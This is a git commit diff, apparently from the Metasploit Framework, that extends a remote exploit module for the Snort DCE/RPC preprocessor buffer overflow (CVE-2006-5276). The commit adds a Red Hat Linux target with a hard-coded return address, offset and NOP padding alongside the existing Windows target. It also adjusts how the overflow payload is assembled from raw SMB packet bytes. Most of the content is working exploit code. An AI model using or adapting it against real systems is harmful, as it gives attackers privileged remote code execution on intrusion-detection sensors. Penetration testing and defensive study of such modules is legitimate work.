merged unstable-modules/exploits/incomplete/linux/ids/snortdcerpc.rb with exploits/windows/ids/snort_dce_rpc.rb
parent
b282901b08
commit
dc6b2f4205
|
@ -31,14 +31,18 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
'Author' =>
|
||||
[
|
||||
'Neel Mehta', #Original discovery (IBM X-Force)
|
||||
'Carsten Maartmann-Moe <carsten[at]carmaa.com>' #Metasploit
|
||||
'Trirat Puttaraksa', #POC
|
||||
'Carsten Maartmann-Moe <carsten[at]carmaa.com>', #Metasploit win
|
||||
'0a29406d9794e4f9b30b3c5d6702c708' #Metasploit linux
|
||||
|
||||
],
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => 'win',
|
||||
'References' =>
|
||||
[
|
||||
[ 'OSVDB', '32094' ],
|
||||
[ 'CVE', '2006-5276' ],
|
||||
[ 'URL', 'http://web.archive.org/web/20070221235015/http://www.snort.org/docs/advisory-2007-02-19.html'],
|
||||
[ 'URL', 'http://sf-freedom.blogspot.com/2007/02/snort-261-dcerpc-preprocessor-remote.html'],
|
||||
[ 'URL', 'http://downloads.securityfocus.com/vulnerabilities/exploits/22616-linux.py']
|
||||
],
|
||||
'DefaultOptions' =>
|
||||
|
@ -56,10 +60,21 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
'Windows Universal',
|
||||
{
|
||||
'Platform' => 'win',
|
||||
'Ret' => 0x00407c01, # JMP ESP snort.exe
|
||||
'Offset' => 289 # The number of bytes before overwrite
|
||||
'Offset' => 289, # The number of bytes before overwrite
|
||||
'Padding' => 0
|
||||
}
|
||||
],
|
||||
[
|
||||
'Redhat 8',
|
||||
{
|
||||
'Platform' => 'linux',
|
||||
'Ret' => 0xbffff110,
|
||||
'Offset' => 317,
|
||||
'Padding' => 28
|
||||
}
|
||||
]
|
||||
],
|
||||
'Privileged' => true,
|
||||
'DisclosureDate' => 'Feb 19 2007',
|
||||
|
@ -133,7 +148,6 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
# Write AndX Request #2
|
||||
header << "\x0e\xff\x00\xde\xde\x00\x40\x00\x00\x00\x00\xff\xff\xff\xff\x80"
|
||||
header << "\x00\x48\x00\x00\x00\xff\x01"
|
||||
|
||||
tail = "\x00\x00\x00\x00\x49\x00\xee"
|
||||
|
||||
# Return address
|
||||
|
@ -150,9 +164,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
requestsize = [(sploit.size() + target['Offset'])].pack('v')
|
||||
|
||||
# Assemble the parts into one package
|
||||
p.payload = header << requestsize << tail << eip << sploit
|
||||
p.payload = header << requestsize << tail << make_nops(target['Padding']) << eip << sploit
|
||||
|
||||
p.recalc
|
||||
|
||||
p
|
||||
end
|
||||
end
|
||||
end
|
Loading…
Reference in New Issue